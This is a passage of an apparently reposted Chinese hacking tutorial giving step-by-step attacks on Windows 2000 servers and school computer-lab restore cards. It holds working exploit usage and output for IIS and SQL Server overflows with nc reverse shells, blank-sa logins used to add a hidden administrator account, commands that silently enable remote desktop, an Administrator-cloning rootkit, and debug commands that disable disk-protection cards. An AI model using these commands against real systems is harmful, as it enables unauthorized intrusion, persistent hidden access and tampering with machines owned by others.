程序会提示“发送shellcode 到 127.0.0.15:80 OK”。

4、进入MS-DOS方程。进入“nc”的目录。然后：nc --v 127.0.0.15 80

D:\>nc -vv 127.0.0.15 813
127.0.0.15: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [127.0.0.15] 813 (?): connection refused
sent 0, rcvd 0: NOTSOCK


D:\>

没有成功。

选择“操作系统类型”：IIS5 Chinese Win2k Sp1

说明：

Sp1：sp1是微软的补丁名称。分别有sp1、sp2、sp3等。这里是指已经打了sp1补丁的主机。

重复第3-4步。

D:\>nc -vv 127.0.0.15 813
127.0.0.15: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [127.0.0.15] 813 (?) open
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>

成功了！

现在，你获得system权限。如同在DOS下操作主机一样，控制它！


（四）、.printer漏洞
本次范例需要的系统及程序情况如下：

操作系统：Window2000

对方操作系统：Windows2000

程序（一）：iis5hack （.printer溢出工具）

程序（二）：nc for nt 版

本机IP：127.0.0.1

测试IP：127.0.0.19

新程序说明：

iis5hack，是sunx写的一个在windows平台的.printer溢出程序。

特点：可以bind port 80，穿透all
firewall（防火墙），随你什么rule，统统透过。

使用方法：

D:\>iis5hack
iis5 remote .printer overflow. writen by sunx
http://www.sunx
for test only, dont used to hack,

usage: D:\IIS5HACK.EXE

说明：

D:\IIS5HACK.EXE：程序路径。

：127.0.0.19：溢出的主机。

：主机的端口。

：主机的类型。

：溢出的端口。
chinese edition: 0
chinese edition, sp1: 1
english edition: 2
english edition, sp1: 3
japanese edition: 4
japanese edition, sp1: 5
korea edition: 6
korea edition, sp1: 7
mexico edition: 8
mexico edition, sp1: 9
D:\>

测试：

找到主机：127.0.0.19

D:\>iis5hack 127.0.0.19 80 1 3739

iis5 remote .printer overflow. writen by sunx
http://www.sunx
for test only, dont used to hack,

Listn: 80

connecting...
sending...
Now you can telnet to 3739 port
good luck

溢出成功！

D:\>nc 127.0.0.19 3739

http://www.sunx

Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.

C:\WINNT\system32>whoami
SYSTEM

成功取得system权限！

（六）、空sa密码
本次范例需要的系统及程序情况如下：

操作系统：Windows 2000

对方操作系统：Windows 2000

程序（一）：流光 IV 国际版 （Fluxay Release IV Build 2914 International
Edition For NT/2000/XP）

程序（二）

本机IP：127.0.0.1

测试IP：127.0.0.22

新程序说明：

流光 IV
版，是“小榕实验室”的程序员小榕制作的。具有功能强大、界面友好等特点。

流光IV的高级扫描：

PORTS（常用端口、自定义端口）
POP3（Banner、特定版本漏洞、暴力模式）
FTP（Banner、特定版本漏洞、暴力模式）
SMTP（Banner、特定版本漏洞、暴力模式）
IMAP（Banner、特定版本漏洞、暴力模式）
TELNET（Banner、特定版本漏洞）
CGI（Banner、Unix/NT自动识别、ErrorPage检测、规则库可手工加入。）
SQL（通过漏洞扫描、暴力模式）
IPC(NETBIOS)（获得用戶列表、共享列表、暴力模式）
IIS（IIS漏洞）
FINGER（Finger漏洞扫描）
RPC（Unix Finger漏洞扫描，获得用戶列表）
MISC（Bind 版本、MySql脆弱密码扫描)
PLUGIN（可以方便地增加对某种类型漏洞的扫描）


此版本会根据Windows的语言环境为变。例如，简体中文Windows2000。安装后，它显示的文字就是简体中文。
测试：

1、打开流光。

2、按Ctrl+R。出现扫描设置对话框，设置扫描IP段，并且选择扫描的类型为SQL。

（如果选择了“常用密码扫描”，整个扫描的速度会变慢，但是成功率会提高。）

3、点击“确定”，进行扫描。

等一会儿……

假设我们取得主机：127.0.0.22

（SA的权限相当于系统的超级用户权限，得到SA之后，有80%的机会得到进一步得到Admnistrators的权限。）

4、点击“工具” ——
SQL远程命令（或者直接用Ctrl+Q），填入主机（127.0.0.22）、用户（sa）、密码（

空）等信息。

小技巧：你可以在密码列表中双击选中的项目。这样可以直接出现命令行界面，而不必手工输入。

5、点击“连接”，出现远程命令行的界面。

这样就可以通过这个工具，就可以查看文件，主机添加/删除用户。

例如：

添加一个用户：cnhack

密码为：test

net user cnhack 123 /add

将cnhack加入Administrator（管理员）组：

net localgroup administrators cnhack /add

输入quit退出此工具。

此方法的成功率为80%，但并不是所有的主机都有效。

当然得到数据库的密码之后就可以对数据进行查询、修改、删除等工作，这涉及到SQL的知识，大家可以自己看

资料，说多了又说我罗嗦了。

（七）、SQL漏洞
我只是说说实战！利用这个漏洞我们需要两个攻击工具，一个是我们已经很熟悉的NC，还有一个是我们还没有

接触的工具SQL2，，让我们先看看这个工具的吧！在DOS下输入SQL2
Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.
D:\>F:

F:\>CD HACK

F:\hack>SQL2
===========================================================
SQL Server UDP Buffer Overflow Remote Exploit

Modified from "Advanced Windows Shellcode"
Code by David Litchfield, david@ngssoftware
Modified by lion, fix a bug.
Welcome to HUC Website http://wwwhonker

Usage:
SQL2 Target [ ]

Exemple:
Target is MSSQL SP 0:
C:\>nc -l -p 53
C:\>SQL2 db.target 202.202.202.202 53 0
Target is MSSQL SP 1 or 2:
c:\>SQL2 db.target 202.202.202.202


F:\hack>
现在我们已经很清楚了，如果你要攻击以个开了SQL服务的主机（SQL的端口是1433）
只要输入以下的信息就可以了：
sql2.exe 要攻击的主机IP或者域名 开了nc监听的本地主机的IP或者域名
nc监听的端口 被攻击主机打的补丁

版本。
下面我们举个例子：
在本机上打开一个命令提示符窗口，输入
nc -l -p 48
解析一下，参数l表示在让nc监听本地端口，加上－p 48
表示在本机在监听48端口，这样NC就可以工作了。
F:\hack>nc -l -p 48
，在开一个命令提示符窗口
输入
sql2 61.*.*.* 211.*.*.*48 1
这个溢出包就发送了，如果对方的信息正确而且对方又没有打补丁那就恭喜你了，我们看看我们打开的第一个

窗口
Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.
F:\hack>nc -l -p 48
Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.

D:\WINNT\system32>dir c:
驱动器 C 中的卷没有标签。
卷的序列号是 1A70-1CF7

C:\ 的目录

2003-01-15 21:42

WINDOWS
2003-01-15 22:26 1,689 MSDOS.SYS
2003-01-15 21:42
Program Files
2003-01-15 21:57
My Documents
2003-01-15 21:58
VIAUDIO
2002-01-30 14:22
HEROSOFT
2002-01-30 15:47
FOUND.000
1 个文件 1,689 字节
6 个目录 2,738,245,632 可用字节

D:\WINNT\system32>
仔细看一下不是你的吧！
接下来的事情就是你的了，我就不说了。

六、关于如何打开3389

如果对方的端口有开放:
telnet 192.168.0.1
输入用户名/密码
C:\>
\\成功进入!!!!
进入后,再次检查终端组件是否安装:
c:\>query user
这个工具需要安装终端服务.
这样就进一步确定了组件没有被安装.如果返回:
USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME
>w1 console 0 运行中 . 2002-1-12 22:5
\\类似这样的信息,可能组件就已安装.

好!都清楚了,可以开始安装了.
---------------------------------------------------
C:\>dir c:\sysoc.inf /s //检查INF文件的位置
c:\WINNT\inf 的目录

2000-01-10 20:00 3,770 sysoc.inf
1 个文件 3,770 字节
-----------------------------------------------------
C:\> dir c:\sysocmgr.* /s //检查组件安装程序
c:\WINNT\system32 的目录

2000-01-10 20:00 42,768 sysocmgr.exe
1 个文件 42,768 字节
-----------------------------------------------------
c:\>echo [Components] > c:\wawa
c:\>echo TSEnable = on >> c:\wawa
//这是建立无人参与的安装参数
c:\>type c:\wawa
[Components]
TSEnable = on
//检查参数文件
------------------------------------------------------
c:\>sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\wawa /q
-----------------------------------------------------
这一条就是真正安装组件的命令.
以上这条命令没有加/R参数,主机在安装完后自动重起.
如若加了/R参数主机就不会重起.

如果一切正常的话,几分钟后对方主机将会离线,当它重新回来时,
3389终端服务就已经开启.你就可以连上去了.

这里还有两种方法
第一种开启的办法:
使用DameWare Mini Remote Control远程连接上,
在"终端服务配置"里,重新启用RDP连接,马上就可以使用3389了.
第二种开启的办法:
修改远程注册表.
比如:
主机IP: 192.168.0.1
已有的帐号和密码: wawa/7788
首先与远程主机建立连接
net use \\192.168.0.1\ipc$ "7788" /user:"wawa"
再打开本机注册表
"开始"==>"运行"==>regedit
在"注册表"下拉菜单中选择"连接网络注册表"
在"计算机名"中输入 \\192.168.0.1
这样就进入了远程主机注册表.
现在我们找到这里:
hkey_local_machine\system\currentcontrolset\control\terminal

server\winstations\rdp-tcp\fEnableWinStation
将fEnableWinStation值由0改为1
SQLEXEC或telnet进入后,检查终端组件是否安装:
c:\>query user
这个工具需要安装终端服务.
这样就进一步确定了组件没有被安装.如果返回:
USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME
>w1 console 0 运行中 . 2002-1-12 22:5
\\类似这样的信息,可能组件就已安装.
好!都清楚了,可以开始安装了.
---------------------------------------------------
C:\>dir c:\sysoc.inf /s //检查INF文件的位置
c:\WINNT\inf 的目录

2000-01-10 20:00 3,770 sysoc.inf
1 个文件 3,770 字节
-----------------------------------------------------
C:\> dir c:\sysocmgr.* /s //检查组件安装程序
c:\WINNT\system32 的目录

2000-01-10 20:00 42,768 sysocmgr.exe
1 个文件 42,768 字节
-----------------------------------------------------
c:\>echo [Components] > c:\wawa
c:\>echo TSEnable = on >> c:\wawa
//这是建立无人参与的安装参数
c:\>type c:\wawa
[Components]
TSEnable = on
//检查参数文件
------------------------------------------------------
c:\>sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\wawa /q
-----------------------------------------------------
这一条就是真正安装组件的命令.
以上这条命令没有加/R参数,主机在安装完后自动重起.
如若加了/R参数主机就不会重起.

如果一切正常的话,几分钟后对方主机将会离线,当它重新回来时,
3389终端服务就已经开启.你就可以连上去了.


七、关于克隆 Administrator
这是一篇榕哥的文章，相信已经有很多的人看过了，还是转载一下吧！
利用这个工具可以将Administrator的帐号克隆为一个指定的普通帐号（此普通帐号必须已经存在）。克隆得到

的帐号具有和系统内置的Administrator同样的设置，并且用NET命令或者用户管理器也发现不了其权限已经被

提升，是一个不错的ROOT KIT.
用一个例子说明用法：

1、假定我们通过扫描器获得了192.168.0.1上用户test的密码为test（属于administrators组）.

2、利用GetAccount（http://wwwXeyes/cgi-bin/GetAccount.exe)获得系统中已经存在的帐号信息（

当然利用空连接也可以）。

C:\>getaccount \\192.168.0.1 1

GetAccount Via SID, by netXeyes 2002/04/06

Connect Host 192.168.0.1 ....OK

Start Ememurate Account....

Name is: TsInternetUser
Name is: NetShowServices
Name is: NetShow Administrators
Name is: IUSR_VICTIM
Name is: IWAM_VICTIM
Name is: zjf
Name is: DHCP Users
Name is: DHCP Administrators

Disconnect Host 192.168.0.1 ....OK

3、利用SA.exe 将Iusr_victim克隆为Administrator。

C:\>ca \\192.168.0.1 test test iusr_victim password
Clone Administrator, by netXeyes 2002/04/06
Written by netXeyes 2002, dansnow@21cn

Connect 192.168.0.1 ....OK
Get SID of iusr_victim ....OK
Prepairing ....OK
Processing ....OK
Clean Up ....OK

C:\>

这时，iusr_victim就成为了超级用户，并有具有和Administrator同样的设置(桌面、菜单等等）。

在192.168.0.1上面用Net命令查看的结果：

User name IUSR_VICTIM
Full Name Internet Guest Account
Comment Built-in account for anonymous access to Internet I
nformation Services
User\\\\\\\\\\\\\\\\\\\\\\''s comment Built-in account for anonymous access to Internet I
nformation Services
Country code 000 (System Default)
Account active Yes
Account expires Never

Password last set 2002/4/28 下午 10:31
Password expires Never
Password changeable 2002/4/28 下午 10:31
Password required Yes
User may change password No

Workstations allowed All
Logon script
User profile
Home directory
Last logon 2002/4/28 下午 09:02

Logon hours allowed All

Local Group Memberships *Guests
Global Group memberships *None

下载: http://wwwXeyes/cgi-bin/CA.exe

八、关于网吧还原卡破解
还原卡这无聊的东东现在好像很流行,特别是在众学校,可把同学们给还原苦了,
一旦重启,别无所有. 众人怒曰

:"把机器给卸了!!!!!!!!!"
菜人俺也曾深受其害,本来做好的想给给MM们看的小程序,随着reset,一去不回了!!!!
怒从胆边生,一定要废了它.

下面说二种方法，其实我觉得是第二种好！
一。
其实破解还原卡比破解cmos还要快,*作上就那几步,只是*作上有点吓人(俺菜嘛.
本来想给这篇起名"10秒内破

解硬盘还原卡",不过上次那篇"15秒内破解cmos"让众网友臭骂了一顿:"如果设了开机密码看你怎么办!!",俺无

语凝噎...555555...5555555~~~ 因此还是15秒吧,踏实些!

本篇文章的目的:让从未接触过debug的弟兄,也能顺利的破解还原卡,俺也会加上适当的注释
,权当了解吧. 说

白了,就是没学过计算机的也能按照俺的步骤破解它!!!!! 高手止步,请回


原理性的东东我不想在这废话,想和俺讨论或指点俺的朋友请到
最后一httP://lastknife.yeah ;

废话不说了,进入正题,破解方法有2:
第一种破解率还可以.
第二种好像是万能的(俺还没碰到破解不了的----见识短的表现-

第一种:
开机时(也就是在你曾经进入cmos的时刻),同时按住ctrl+home,这样你就进入了
还原卡的密码输入窗口,只要输入正确的密码即可获得admin,以后随你怎样设置.
关于是密码的问题:一般还原卡都有默认密码的,默认密码怎么找,很简单,到网上搜索
关键词"还原卡"就行了,找到你用的那个牌子的还原卡,进入站点,在一个比较偏僻的角落
一般可以找到默认密码的.
而一般机房管理员是不会修改其默认密码的,比如俺学校的
台湾远志牌的还原卡的默认密码是12345678,
小哨兵的是manager, 机房管理员一个也没改,好爽!!!!!!!!!!
不过我可没破坏任何东东,一旦惹怒了俺,嘿嘿....俺也不会破坏的,
恶意破坏计算机就是对自己的不尊重!!!!

如果管理员把密码改了呢?那就拿出宝刀---
方法二:
此法实施过程看起来挺麻烦,不过熟悉了*作起来超不过15秒的-
高手sinister曰:
其实所谓硬盘保护卡就是在ROM中写了一段HOOK INT 13的程序，屏蔽了
一些功能调用如AH=3，5等，在中断向量表中INT 13的SEG，OFFSET
描述为[13h*4+2]，[13h*4]，将此中的程序先保存后，再替换为自己的代码，
当你AH=2的时，它便会call原始INT 13地址来完成*作.
只要找到原始INT 13入口便可以为所欲为.
不知看了这段感觉如何?慢慢消化吧.

主要矛盾:关键是要找到原始的int 13入口.
测试*作系统:win98
测试对象: 台湾远志还原卡
测试地点: 学校机房
测试目的: 控制还原卡,但不破坏.

注:本篇文章不对其实施过程中出现的任何不可预料的情况负责!!!!!
具体过程如下:
开机过程按住F8键,进入纯dos环境, 注";"后为注释.
出现提示符c:,
键入c:\debug,
- a100
- xor ax,ax
- int 13
- int3
; 寻找原始的int 13入口.
然后输入t回车，不断的重复，直到显示的地址形如 F000:xxxx
,后面的指令为:mov dl,80 (练练眼力-。按q退出.
记下这一地址, 在(0:13H*4)=0:4cH 处填入这个地址。
例如俺的得到的地址是F000:9A95
再次运行debug ,键入:
-e 0:4c 95 9A 00 F0 ;e的作用将数据表"95 9A 00
f0",写入地址0:4c开始的字节中.
-q

注： 填的时候要仔细，填错的话会死机。ok,破解完成.
这时在提示符c:\键入
c:\win
进入win98系统即可,那么这次你在win98系统中的一切*作,随着下一次
的启动都会被还原卡存储起来。
不过下一次进入系统的的时候，你还是需要重写地址0:4c,才可以让还原卡存储你的东东。
这时只需要在纯dos下进入debug,键入
-e 0:4c 95 9A 00 F0
-q 即可。
哈哈。。。这样也挺好，只有你才是这台computer的真正的主人 -。
别人还是受还原卡的限制的except--you 。
第二种方法理论上比较简单，不过我没有试过，写给有条件的朋友参考：
我不说大篇的理论，只是在实践中发现，硬盘还原卡通常在BIOS中要设置，没有了这个设置，硬盘还原卡就不

能保护硬盘了，而且通常CMOS还加上密码，
所以笔者想只要清CMOS设置即可破解还原卡了，所以只要在DOS窗

口（可以在WIN98下也可在DOS操作）进行DEBUG就可以了：
如debug
-o 70 10
-o 71 16
-q
后即可随意在C盘中增删了。
还有一种方法比较简单，我们可以去天天安全网去看详细的说明。我这里只是简单的说明一下。主要是利用了

WINHEX这个软件，首先在还原精灵的图标上点击右键，选择修改密码，这时候会弹出一个对话框，需要你输入

以前的密码和新密码，当然我们不知道以前的密码，那我们就随便输入，比如youname，修改以后的新密码输入

name，两次要一样哦！这样就可以了，当然点击确定以后会弹出警告框，说你的密码是错误的，这时候千万不

要点击确定。我们打开WINHEX，选择打开内存，找到还原精灵的名字，应该是hp什么的，我也记得不是很清楚

了，多试一试，应该能找到的，然后选择只要内存，在菜单上选择“编辑”——“查找”输入你改密码的时候

输入的旧密码，我们这里是youname，那就就找他吧。找到以后会在这个名字的下面找到你想要的密码，一般是

很清楚的字符，我们可以一个一个的试一试。
在这里需要提醒是，我们在输入我们不知道的旧密码的时候，不要输入象123456789或者abcd这样的字符，因为

一般的软件都是有这样的字符，输入这样的会在你以后查找密码的时候遇到一点困难，影响兴趣不是吗？

转载自 ：http://www.16789/bbs/listC1.asp?id=30594&typeid=7

本文标签： 初涉网络